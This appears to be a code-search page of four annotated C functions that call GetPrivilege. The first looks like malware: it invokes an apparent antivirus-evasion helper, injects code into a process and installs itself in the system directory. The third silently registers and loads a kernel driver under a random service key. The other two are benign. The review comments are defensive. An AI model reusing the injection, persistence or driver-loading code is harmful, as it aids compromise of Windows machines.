Esempio n. 1
//-----------------------------------------------------------------
/*
 * WinMain: builds "<system dir>\<MY_MACRO_RECORD_NAME>.exe" in a fixed
 * 128-byte stack buffer, injects EnterPoint into the process chosen by
 * ProcIdByPriv(0) and, when that file does not yet exist, registers the
 * program through AddIntoSystem(). Every path returns FALSE, so the
 * launching process exits right away.
 *
 * NOTE(review): the two arms of the SeDebugPrivilege test are byte-identical,
 * so the privilege check has no effect on what runs. From a defender's view
 * the observable artifacts are the new executable in the system directory
 * and whatever persistence AddIntoSystem() creates (not visible here).
 */
BOOL __stdcall WinMain(HINSTANCE, HINSTANCE, PTSTR, int){

	char	buf[128];	// path buffer; no bound check is applied below

	AVPsex();	// external helper; its effect is not visible in this listing
	GetSystemDirectory(buf, 128);	// failure (return 0) is not checked; buf would then be undefined
	// The three strcat() calls are unbounded: "<sysdir>" + "\\" +
	// MY_MACRO_RECORD_NAME + ".exe" must fit in 128 bytes, but nothing
	// verifies that (the macro's length is not visible here).
	strcat(buf, "\\");
	strcat(buf, MY_MACRO_RECORD_NAME);
	strcat(buf, ".exe\0");	// the explicit "\0" is redundant: strcat stops at the literal's own terminator
	GetMaxPriv();	// return value ignored
	// InstallAndRegisterDrivers();
	// Both arms of this if/else do exactly the same thing; GetPrivilege()'s
	// result is therefore irrelevant to behaviour.
	if(GetPrivilege("SeDebugPrivilege")){
		if(FileExist(buf)){
            InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);	// result ignored
		}else{
			InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);	// result ignored
			 AddIntoSystem(MY_MACRO_RECORD_NAME, 1);	// second argument's meaning is not visible here
			 AddIntoSystem(MY_MACRO_RECORD_NAME, 0);
			return FALSE;
		}
	}else{
		// Duplicate of the arm above.
		if(FileExist(buf)){
            InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
		}else{
			InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
			 AddIntoSystem(MY_MACRO_RECORD_NAME, 1);
			 AddIntoSystem(MY_MACRO_RECORD_NAME, 0);
			return FALSE;
		}
	}

return FALSE;	// reached when the file already existed; same result as the other paths
}
Esempio n. 2
/*
 * SetRunTimeState: refresh the global webcam runtime state from the
 * configuration. The privilege level is queried from the HTTP connection
 * only while user checking is enabled; otherwise it is forced to 0.
 * The motion-detection mode is copied through unchanged.
 */
void SetRunTimeState(HTTPCONNECTION hConnection)
{
	const unsigned char userCheck = (unsigned char)g_ConfigParam.bUserCheck;

	g_WebCamState.ucUserCheck = userCheck;
	// GetPrivilege() is only consulted when the check is on.
	g_WebCamState.ucPrivilege = userCheck
		? (unsigned char)GetPrivilege(hConnection)
		: 0;
	g_WebCamState.ucMotionDetectWay = g_ConfigParam.ucMotionDetectWay;
}
Esempio n. 3
/*
 * StartSys: register the driver file at chSysPath as a kernel service under
 * CurrentControlSet\Services (key name = current tick count in hex, so it
 * differs on every run) and ask the kernel to load it with NtLoadDriver().
 *
 * Nothing is returned; success or failure is only visible via DbgPrint().
 *
 * NOTE(review): the results of GetPrivilege(), every RegSetValueEx() and
 * NtLoadDriver() are discarded, the service key is never removed again,
 * and the buffer handling has the defects flagged inline. For a defender
 * the lasting artifact is that hex-named service key whose ImagePath
 * starts with "\??\".
 */
VOID StartSys(LPCSTR chSysPath)
{
	NTSTATUS St;
	BOOL bRet = FALSE;	// unused
	HKEY hKey;
	CHAR chRegPath[MAX_PATH];	// uninitialized; see the _snprintf note below
	WCHAR wcLoadDrv[MAX_PATH];	// uninitialized; same issue
	CHAR chImagePath[MAX_PATH] = "\\??\\";	// NT object-path prefix; remaining bytes are zero-filled
	UNICODE_STRING usStr;
	DWORD dwType;

	GetPrivilege(SE_LOAD_DRIVER_PRIVILEGE);	// result ignored; without this privilege NtLoadDriver is expected to fail

	DbgPrint(__FUNCTION__"(): driver path '%s'\n",chSysPath);

	DWORD dwId = GetTickCount();	// used as the service/key name below

	// _snprintf()/_snwprintf() do not write a terminator when the output
	// fills the given count, and these buffers start uninitialized, so a
	// truncated result is unterminated; passing RTL_NUMBER_OF-1 reserves a
	// spare byte but nothing stores a '\0' into it.
	_snprintf(chRegPath,RTL_NUMBER_OF(chRegPath)-1,"system\\currentcontrolset\\services\\%x", dwId);
	_snwprintf(wcLoadDrv,RTL_NUMBER_OF(wcLoadDrv)-1,L"\\registry\\machine\\system\\currentcontrolset\\services\\%x", dwId);

	// BUG: strncat's count must be the space left after the 4-byte prefix
	// (and the terminator), not the whole buffer size; a chSysPath longer
	// than MAX_PATH-5 bytes writes past the end of chImagePath.
	strncat(chImagePath,chSysPath,sizeof(chImagePath));
	if (RegCreateKey(HKEY_LOCAL_MACHINE,chRegPath,&hKey) == ERROR_SUCCESS)
	{
		// &chImagePath is the address of the array (same location as the
		// array itself, different pointer type); length includes the NUL.
		RegSetValueEx(hKey,"ImagePath",0,REG_SZ,(LPBYTE)&chImagePath,strlen(chImagePath)+1);

		dwType = SERVICE_KERNEL_DRIVER;
		RegSetValueEx(hKey,"Type",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));

		dwType = SERVICE_DEMAND_START;	// manual start: loaded only by the explicit call below
		RegSetValueEx(hKey,"Start",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD));

		RegCloseKey(hKey);

		// NtLoadDriver takes the registry path of the service key as a
		// UNICODE_STRING; usStr only references wcLoadDrv, it does not copy it.
		RtlInitUnicodeString(&usStr,wcLoadDrv);
		St = NtLoadDriver(&usStr);

		DbgPrint(__FUNCTION__"(): NtLoadDriver status %x\n",St);	// status is only logged, never acted on
	}
	else
	{
		DbgPrint(__FUNCTION__"(): RegCreateKey last error %x\n",GetLastError());
	}
}
Esempio n. 4
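/*
 * cmd_dropcaches: purge the Windows standby (file-cache) list by calling
 * NtSetSystemInformation(SystemMemoryListInformation, MemoryPurgeStandbyList).
 *
 * Returns the NTSTATUS produced by NtSetSystemInformation (STATUS_SUCCESS ==
 * 0) or, when a prerequisite fails (token open, privilege, ntdll lookup), the
 * value returned by error(). All failures are also reported through error().
 *
 * GetPrivilege(hToken, name, 1) is taken to enable the named privilege on
 * the process token — confirm against its definition elsewhere in the file.
 *
 * Fixes relative to the previous version: hToken was leaked when
 * GetPrivilege() failed, and the ntdll module reference was leaked when
 * GetProcAddress() failed.
 */
static int cmd_dropcaches(void)
{
	HANDLE hProcess = GetCurrentProcess();
	HANDLE hToken;
	HMODULE ntdll;
	DWORD(WINAPI *NtSetSystemInformation)(INT, PVOID, ULONG);
	SYSTEM_MEMORY_LIST_COMMAND command;
	int status;

	if (!OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
		return error("Can't open current process token");

	if (!GetPrivilege(hToken, "SeProfileSingleProcessPrivilege", 1)) {
		/* Release the token handle on the failure path too. */
		CloseHandle(hToken);
		return error("Can't get SeProfileSingleProcessPrivilege");
	}

	/* The privilege change lives on the token object; the handle itself
	 * is no longer needed. */
	CloseHandle(hToken);

	/* NtSetSystemInformation is resolved at run time so that a missing
	 * export shows up as a version mismatch rather than a link error. */
	ntdll = LoadLibrary("ntdll.dll");
	if (!ntdll)
		return error("Can't load ntdll.dll, wrong Windows version?");

	NtSetSystemInformation =
		(DWORD(WINAPI *)(INT, PVOID, ULONG))GetProcAddress(ntdll, "NtSetSystemInformation");
	if (!NtSetSystemInformation) {
		/* Drop the LoadLibrary reference before bailing out. */
		FreeLibrary(ntdll);
		return error("Can't get function addresses, wrong Windows version?");
	}

	command = MemoryPurgeStandbyList;
	/* The DWORD result is an NTSTATUS; failure codes such as
	 * STATUS_PRIVILEGE_NOT_HELD are negative once stored in the int. */
	status = (int)NtSetSystemInformation(
		SystemMemoryListInformation,
		&command,
		sizeof(command)
	);
	if (status == STATUS_PRIVILEGE_NOT_HELD)
		error("Insufficient privileges to purge the standby list, need admin access");
	else if (status != STATUS_SUCCESS)
		error("Unable to execute the memory list command %d", status);

	FreeLibrary(ntdll);

	return status;
}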